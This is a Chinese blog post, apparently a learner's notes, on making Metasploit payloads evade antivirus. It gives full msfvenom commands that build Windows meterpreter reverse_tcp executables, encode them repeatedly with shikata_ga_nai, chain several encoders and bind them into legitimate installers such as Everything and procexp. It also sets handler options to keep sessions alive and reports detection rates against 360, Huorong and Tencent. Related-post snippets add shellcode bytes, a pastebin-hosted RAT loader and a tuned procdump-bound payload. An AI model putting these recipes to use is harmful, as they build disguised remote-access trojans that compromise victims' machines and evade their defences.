MSF免杀

最新推荐文章于 2023-09-22 16:45:00 发布
最新推荐文章于 2023-09-22 16:45:00 发布
阅读量2.9k 收藏 42
点赞数 8
分类专栏: 渗透测试 文章标签: 免杀
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/111059353
版权


最近开始学习免杀,发现Tide团队有免杀的系列文章,先膜拜一波大佬,这里的博客是复现和学习的笔记,如果你对内容感兴趣可以学习参考链接里提供的地址

参考:
远控免杀专题文章(2)-msfvenom隐藏的参数
远控免杀专题文章(3)-msf自免杀(VT免杀率35/69)

msfvenom简介

msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。

参数

在这里插入图片描述

所有参数如上图,这里解释部分常用参数

-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, –nopsled < length> 为payload预先指定一个NOP滑动长度
-f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload
-a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64
–platform < platform> 指定payload的目标平台
-s, –space < length> 设定有效攻击荷载的最大长度,就是文件大小
-b, –bad-chars < list> 设定规避字符集,指定需要过滤的坏字符例如:不使用 '\x0f'、'\x00';
-i, –iterations < count> 指定payload的编码次数
-c, –add-code < path> 指定一个附加的win32 shellcode文件
-x, –template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中
-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行
–payload-options 列举payload的标准选项
-o, –out < path> 指定创建好的payload的存放位置
-v, –var-name < name> 指定一个自定义的变量,以确定输出格式
–shellest 最小化生成payload
-h, –help 查看帮助选项
–help-formats 查看msf支持的输出格式列表

比如

  • 想查看windows/meterpreter/reverse_tcp支持什么平台、哪些选项,可以使用msfvenom -p windows/meterpreter/reverse_tcp --list-options
  • 使用msfvenom --list payloads可查看所有payloads
  • 使用msfvenom --list encoders可查看所有编码器

评级最高的两个encoder为cmd/powershell_base64x86/shikata_ga_nai,其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器了

  • 类似可用msfvenom --list命令查看的还有payloads, encoders, nops, platforms, archs, encrypt, formats

一些重要的监听参数

防止假session

在实战中,经常会遇到假session或者刚连接就断开的情况,这里补充一些监听参数,防止假死与假session。

msf exploit(multi/handler) > set ExitOnSession false   //可以在接收到seesion后继续监听端口,保持侦听。

防止session意外退出

msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0  //默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
msf5 exploit(multi/handler) > set SessionExpirationTimeout 0 //默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭

handler后台持续监听

msf exploit(multi/handler) > exploit -j -z

使用exploit -j -z可在后台持续监听,-j为后台任务,-z为持续监听,使用Jobs命令查看和管理后台任务。jobs -K可结束所有任务。
还有种比较快捷的建立监听的方式,在msf下直接执行:

msf5 > handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp

在这里插入图片描述

实验环境

为避免木马被杀导致别的平台没有机会检测,实验时会每次只启动一个杀软,然后截图,最后把关于这个木马的截图汇成一张图
选择的是当下最新版本的火绒、360、360杀毒、腾讯电脑管家,版本如下:
火绒:5.0.55.2
腾讯电脑管家:13.6.20672.243
360:12.0.0.2003
360杀毒:50.0.8170(64位)

裸奔payload(VT查杀56/71)

测试机器运行,在拖进win7的同时,360杀毒、火绒可报;手动运行程序,都能报
选择使用频率最高的windows/meterperter/reverse_tcp,这也是被各大杀软盯的最紧的一个

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe -o payload1.exe

在这里插入图片描述
在这里插入图片描述

MSF自编码处理(VT查杀55/71)

测试机器运行,在拖进win7的同时,360杀毒、火绒,腾讯可报;手动运行程序,都能报
使用msfvenom --list encoders可查看所有编码器。
评级最高的两个encoder为cmd/powershell_base64x86/shikata_ga_nai,其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器了。使用x86/shikata_ga_nai生成payload,参数-i为编码次数,我这里设置15次,并使用了-b参数去掉payload中的空字符

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 15  -f exe -o payload2.exe

在这里插入图片描述

由于shikata_ga_nai编码技术是多态的,也就是说每次生成的payload文件都不一样,有时生成的文件会被查杀,有时却不会。当然这个也和编码次数有一定关系,编码次数好像超过70次就经常生成出错,但是编码次数多并不代表免杀能力强。
在这里插入图片描述

MSF捆绑(VT查杀41/69)

测试机器运行,360杀毒,火绒动静态可报,360动态可报,腾讯失败
在生成payload时可以使用捆绑功能,使用msfvenom的-x参数可以指定一个自定义的可执行文件作为模板,并将payload嵌入其中,-x后面跟对应文件路径就可以,我这里使用Everything来演示

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.239.128 LPORT=3333 -x Everything-1.4.1.1000.x64-Setup.exe -f exe -o payload3.exe

生成的文件对比一下,大小完全一致
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

另外,能否免杀也和你选的被捆绑exe有一定关系,可以选微软的一些工具作为模板exe程序,试试微软家的procexp.exe(VT查杀41/69)
在这里插入图片描述

MSF捆绑+编码(VT查杀43/70)

将上面的两种方式组合一下
火绒,360杀毒动静态可报,360动态可报,腾讯失败

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.239.128 LPORT=3333 -e x86/shikata_ga_nai -x Everything-1.4.1.1000.x64-Setup.exe -i 15 -f exe -o payload4.exe

在这里插入图片描述
在这里插入图片描述

MSF多重编码(VT查杀41/70)

360杀毒动静态可报,360动态可报,火绒和腾讯失败
msfvenom的encoder编码器可以对payload进行一定程度免杀,同时还可以使用msfvenom多重编码功能,通过管道,让msfvenom用不同编码器反复编码进行混淆。

如下命令

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.40.146 LPORT=5110 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x Everything-1.4.1.1000.x86-Setup.exe -k -f exe > payload5.exe

在这里插入图片描述
在这里插入图片描述

lainwith
关注
  • 8
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
通过Python实现Payload分离免杀过程详解
01-19
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66 \x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x
第六十六课:借助aspx对payload进行分离免杀1
08-03
靶机背景:msf exploit(multi/handler) > set lhost 192.168.1.5msf exploit(multi/handler
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
关于如何使用shellter以及shielden对于正常软件的双重加壳,过火绒和360
07-16
本资源是本人自己学习msf是针对于加壳入侵而特地学习和总结,为了和同工作室进行分享而编辑的ppt,如果有兄弟需要软件以及更加详细的操作的可以私信我,当然我是一个刚刚入门的新手,如果有错误的地方可以告诉我,共同进步,谢谢大家!
kali linux msf系列视频教程
10-25
kali linux msf系列教程 -------------------------------------------- kali msf 系列 第一章虚拟机使用 kali msf 系列 第一章虚拟机使用 kali msf 系列 第二章MSF基础使用+第一个实验 kali msf 系列 第三章浏览器漏洞提权 kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf 系列 第五章利用PDF渗透提权 kali msf 系列 第六章爆破模块讲解 kali msf 系列 第七章木马生成 kali msf 系列 第八章木马免杀 kali msf 系列 第九章持续控制
基于PowerShll的免杀思路,过国外主流杀毒
Sven的忘却日记
06-19 1407
1) 首先准备一个你的RAT小马,可以是任何exe后缀的文件 2)使用工具将exe转换为Base64格式 3)将Base64字符串上传到pastebin.com,或者github,得到一个可访问的raw的地址 4)将得到的raw地址,替换下面ps代码中的URL,并将该文件保存为Inject to powershell.vbs CreateObject("WScript.Shell").Run "P...
简单的Msf木马免杀
weixin_47948655的博客
08-12 956
简单加密shellcode与加载器实现msf木马免杀
成为一名优秀的网络安全工程师需要具备哪些才能?
最新发布
weixin_51725318的博客
09-22 137
成为一名优秀的网络安全工程师需要具备哪些才能?
免杀的N种姿势-msf
m0_51268003的博客
04-02 3911
msf是什么?百度一下你就知道 常规参数 -p / -payload 指定payload 支持自定义payload -l / -list 指出攻击模块(payloads、encoders、nops、all)的可用资源 -n / nopsled 为payload预设一个NOP滑动长度 //NOP指令,也称作“空指令”,在x86的CPU中机器码为0x90(1...
Msfvenom编码免杀技术实现免杀实战
weixin_43062666的博客
07-10 2850
免杀技术在网络渗透的实战中十分实用,本文将介绍使用msfvenom自带编码免杀工具进行编码免杀,从而实现绕过杀毒软件获得shell的具体方法。 按照文中所讲述的方法制作的木马载荷可以绕开国内所使用的大多数杀毒软件,包括但不限于火绒,腾讯,百度,金山,virustotal沙箱查杀率12,简单但实用...
msf免杀木马生成
qq_66985187的博客
07-04 2275
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msfmsfvenom)命令实现免杀的操作。由于免杀技术的涉猎面非常广,其中包含反。简称"免杀",它指的是一种能使病毒木马免于被。补充:常见的后门生成方式!在kali中生成常见的木马命令。
安全攻防实战系列MSF
程序员阿飘 的博客
03-04 253
前言 在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobalt strike或msf等c2服务器,之后对内网进行信息收集并绘制网络拓扑图,进行工作组或域渗透,拿到各个网段机器的权限,远程登陆并截图证明。环境配置 从虚拟机网络来看机器描述【一>所有资源获取
msf编码免杀
m0_61506558的博客
09-03 2443
自编码处理自捆绑+编码多重编码接口下载式签名伪装式
【木马免杀
一纸荒芜的博客
08-03 2897
木马免杀
远控免杀专题3---msf免杀
qq_41683305的博客
03-09 1381
0x01 免杀能力一览表 上面表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12.12),火...
远控免杀专题(6)-Venom免杀(VT免杀率11/71)
Ms08067安全实验室
03-02 760
本专题文章导航1、远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2、远控免杀专题(2)-msfvenom隐...
[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。
2301_77111744的博客
07-01 733
【[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。-- 连接WLAN网络和断开连接 -->-- 新建/修改/删除通话记录 -->-- 读取手机状态和身份 -->-- 查看WLAN连接 -->-- 接收讯息(短信) -->-- 请求忽略电池优化 -->-- 修改您的通讯录 -->-- 拍摄照片和视频 -->-- 查看网络连接 -->-- 修改系统设置 -->-- 读取通话记录 -->-- 防止手机休眠 -->-- 读取联系人 -->-- 发送短信 -->-- 拨打电话 -->
免杀马学习(MSF捆绑编码)
红队是青春
02-03 473
仅供学习,入行前的笔记,关于免杀效果请勿喷
制作windows和linux客户端恶意软件进行渗透
m0_47510703的博客
01-23 3453
一、生成Windows后门程序获取shell 使用msfvenom制作简易后门程序 msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机 上执行,在本地监听上线。 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe
在kali Linux中进行msf免杀实验时,使用测试编码并绑定微软官方工具procdump,使用官方procdump做实验 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 134.134 LPORT=8888 -e x86/shikata_ga_nai -x procdump.exe -i 20 -f exe -o flash3.exe应该怎么改
05-05
如果你想进行msf免杀实验,并使用procdump.exe作为载体来绑定恶意代码,可以使用以下命令: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.134.134 LPORT=8888 -x procdump.exe -k -e x86/shikata_ga_nai -i 20 -f exe -o flash3.exe ``` 其中,`-k`参数用于保持进程执行,直到meterpreter session被开启。这个参数在绑定时非常重要,因为它确保了procdump.exe进程继续执行,而不会在绑定后立即停止。这样可以确保你的payload成功植入目标机器并得到执行。 你还可以尝试其他的msfvenom参数,以便更好地适应你的实验环境和目标机器。例如,你可以使用msfvenom的`-b`参数来指定bad characters,也可以使用`-a`参数来指定目标机器的架构。请根据需要进行更改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值